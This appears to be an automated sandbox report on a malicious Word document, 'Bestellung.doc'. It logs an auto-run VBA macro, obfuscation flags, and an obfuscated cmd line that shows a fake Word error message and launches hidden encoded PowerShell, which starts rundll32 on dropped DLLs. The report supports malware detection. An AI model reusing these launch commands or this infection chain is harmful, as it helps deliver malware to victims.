Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00405F04 10_2_00405F04
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0040A525 10_2_0040A525
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00409D2F 10_2_00409D2F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00402DDF 10_2_00402DDF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_004067EF 10_2_004067EF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00407FFE 10_2_00407FFE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00411DFE 10_2_00411DFE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00410B8A 10_2_00410B8A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00403FAF 10_2_00403FAF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00419DBF 10_2_00419DBF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00417BBE 10_2_00417BBE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00404844 10_2_00404844
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0040E044 10_2_0040E044
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00410672 10_2_00410672
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0040BE74 10_2_0040BE74
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0040327F 10_2_0040327F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00412C05 10_2_00412C05
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00401806 10_2_00401806
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00402208 10_2_00402208
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0040240F 10_2_0040240F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0040E612 10_2_0040E612
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00406417 10_2_00406417
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00410223 10_2_00410223
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0041D02D 10_2_0041D02D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00412631 10_2_00412631
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00418A33 10_2_00418A33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0041C6D9 10_2_0041C6D9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0040D2DD 10_2_0040D2DD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0041D4E1 10_2_0041D4E1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0040D6F0 10_2_0040D6F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0040ECFE 10_2_0040ECFE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0040DE81 10_2_0040DE81
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00411090 10_2_00411090
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00414A9E 10_2_00414A9E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0040CAA3 10_2_0040CAA3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0040C145 10_2_0040C145
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00413F4F 10_2_00413F4F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0041434E 10_2_0041434E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0041135B 10_2_0041135B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0040C364 10_2_0040C364
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0041B165 10_2_0041B165
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0041A966 10_2_0041A966
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0040F369 10_2_0040F369
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00403B74 10_2_00403B74
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00407378 10_2_00407378
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00405B7D 10_2_00405B7D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00414F04 10_2_00414F04
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00409106 10_2_00409106
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0041D70B 10_2_0041D70B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0041CF31 10_2_0041CF31
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00407731 10_2_00407731
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00403336 10_2_00403336
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00403938 10_2_00403938
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00407B39 10_2_00407B39
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0041DBC4 10_2_0041DBC4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_004057D4 10_2_004057D4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0040F5E0 10_2_0040F5E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00416BE4 10_2_00416BE4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0041CBE7 10_2_0041CBE7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0041BBF1 10_2_0041BBF1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_004035FC 10_2_004035FC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00417187 10_2_00417187
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00411F88 10_2_00411F88
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00404D90 10_2_00404D90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00413590 10_2_00413590
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0041C192 10_2_0041C192
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0040BB96 10_2_0040BB96
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00412FA1 10_2_00412FA1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_004193AA 10_2_004193AA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0040ADAF 10_2_0040ADAF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_004147B5 10_2_004147B5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_004109B8 10_2_004109B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0040F9BA 10_2_0040F9BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0040FFBA 10_2_0040FFBA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00309C3D 10_2_00309C3D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00314012 10_2_00314012
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: Bestellung.doc OLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentation OLE, VBA macro: Module Ynzysnuyyfihfq23d, Function Document_open Name: Document_open
Document contains embedded VBA macros
Source: Bestellung.doc OLE indicator, VBA macros: true
Source: powershell.exe, 00000005.00000002.2103838754.000000001CE40000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2100282521.0000000001BD0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2099142810.0000000002010000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100145610.0000000002010000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
Source: classification engine Classification label: mal100.troj.evad.winDOC@16/12@6/12
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00412B68 CreateToolhelp32Snapshot, 10_2_00412B68
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$stellung.doc Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRC6D7.tmp Jump to behavior
Source: Bestellung.doc OLE indicator, Word Document stream: true
Source: Bestellung.doc OLE document summary: edited time not present or 0
Source: C:\Windows\System32\msg.exe Console Write: ..%..................................... .D.......D.....................................#.........................%.....h.......5kU............. Jump to behavior
Source: C:\Windows\System32\msg.exe Console Write: ................(...............A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e.......(.......L....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................................................`I.........v.....................K........]............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v.......................j....................................}..v....(.......0.................%.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j..... ..............................}..v............0.................].............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v....................v..j....................................}..v............0.................%.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................v..j......].............................}..v............0...............x.].............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v....#...............&..j....................................}..v............0.................%.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....#...............&..j..... ..............................}..v....X.......0.................].............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v....7..................j.....G].............................}..v.....O......0.................%.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....7..................j....xP..............................}..v.....P......0...............8E].............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v....C..................j.....G].............................}..v.....W......0.................%.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....C..................j....xX..............................}..v.....X......0...............8E].............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............0.......O.........................D..... .......................}..v....._...... .................%.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....O..................j....x`..............................}..v.....`......0...............8E].............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....[.......e.s. .a.r.e. .".S.s.l.3.,. .T.l.s."...".........}..v.....e......0................D].....(.......(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....[..................j.....e..............................}..v....Hf......0...............8E].............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....g.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.7.4.............}..v....Xj......0................D].....$.......(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....g..................j.....k..............................}..v.....k......0...............8E].............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v....s..................j.....G].............................}..v....Xr......0.................%.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....s..................j.....s..............................}..v.....s......0...............8E].............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v.......................j.....G].............................}..v....Xz......0.................%.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....{..............................}..v.....{......0...............8E].............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v.......................j.....G].............................}..v....X.......0.................%.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....................................}..v............0...............8E].............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v.......................j.....G].............................}..v....X.......0.................%.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....................................}..v............0...............8E].............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v.......................j.....G].............................}..v....X.......0.................%.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....................................}..v............0...............8E].............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v.......................j.....G].............................}..v....X.......0.................%.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....................................}..v............0...............8E].............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v.......................j.....G].............................}..v....X.......0.................%.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....................................}..v............0...............8E].............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v.......................j.....G].............................}..v....X.......0.................%.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....................................}..v............0...............8E].............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v.......................j.....G].............................}..v....X.......0.................%.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....................................}..v............0...............8E].............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v.......................j.....G].............................}..v....X.......0.................%.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....................................}..v............0...............8E].............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v.......................j.....G].............................}..v....X.......0.................%.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....................................}..v............0...............8E].............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v.......................j.....G].............................}..v....X.......0.................%.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....................................}..v............0...............8E].............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v.......................j.....G].............................}..v....X.......0.................%.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....................................}..v............0...............8E].............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v.......................j.....G].............................}..v....X.......0.................%.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....................................}..v............0...............8E].............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v.......................j.....G].............................}..v....X.......0.................%.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....................................}..v............0...............8E].............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v....'..................j.....G].............................}..v....X.......0.................%.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....'..................j....................................}..v............0...............8E].............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v....3..................j.....G].............................}..v....X.......0.................%.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....3..................j....................................}..v............0...............8E].............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v....?..................j.....G].............................}..v....X.......0.................%.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....?..................j....................................}..v............0...............8E].............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............E.......K..................j.....G].............................}..v....X.......0.................%.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....K..................j....................................}..v............0...............8E].............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v....W..................j.....G].............................}..v....X.......0.................%.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....W..................j....................................}..v............0...............8E].............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v....c..................j.....G].............................}..v....X.......0.................%.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....c..................j....................................}..v............0...............8E].............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v....o..................j.....G].............................}..v....X.......0.................%.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....o..................j....................................}..v............0...............8E].............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v....{..................j.....G].............................}..v....X"......0.................%.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....{..................j.....#..............................}..v.....#......0...............8E].............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v.......................j.....G].............................}..v....X*......0.................%.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....+..............................}..v.....+......0...............8E].............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v.......................j.....G].............................}..v....X2......0.................%.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....3..............................}..v.....3......0...............8E].............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............8.8.'.+.'.V.'.).).].............................}..v.... 7......0................D].............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....7..............................}..v....X8......0...............8E].............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v.......................j.....G].............................}..v.....?......0.................%.............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....?..............................}..v....8@......0...............8E].............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..%.............y=.v.......................j.....G].............................}..v.....E......0.................%.....r.......(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....@F..............................}..v.....F......0...............8E].............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............ ..........j.....G].............................}..v....PJ......0................D].............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....K..............................}..v.....K......0...............8E].............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....E...............................}..v............0.................].............(............... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....E...............................}..v....(.......0.................].............(............... Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\msg.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll AnyString
Source: Bestellung.doc Virustotal: Detection: 53%
Source: Bestellung.doc ReversingLabs: Detection: 11%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc 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
Source: unknown Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll AnyString
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll AnyString
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll',#1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ueilekrvmxoa\xgsmipbdchc.hxv',GRZxFiVeASCkxit
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ueilekrvmxoa\xgsmipbdchc.hxv',#1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file. Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll AnyString Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll AnyString Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ueilekrvmxoa\xgsmipbdchc.hxv',GRZxFiVeASCkxit Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ueilekrvmxoa\xgsmipbdchc.hxv',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2096554025.0000000002AA7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2096554025.0000000002AA7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2096554025.0000000002AA7000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2096554025.0000000002AA7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2096554025.0000000002AA7000.00000004.00000040.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000005.00000002.2096554025.0000000002AA7000.00000004.00000040.sdmp
Source: Binary string: System.pdb8 source: powershell.exe, 00000005.00000002.2096554025.0000000002AA7000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2103436602.000000001B860000.00000002.00000001.sdmp
Source: Binary string: <ystem.pdb source: powershell.exe, 00000005.00000002.2096554025.0000000002AA7000.00000004.00000040.sdmp

Data Obfuscation:

Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Source: Bestellung.doc Stream path 'Macros/VBA/Jlzk8qsqcshl6jk' : High number of GOTO operations
Source: VBA code instrumentation OLE, VBA macro, High number of GOTO operations: Module Jlzk8qsqcshl6jk Name: Jlzk8qsqcshl6jk
Obfuscated command line found
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc 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
Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
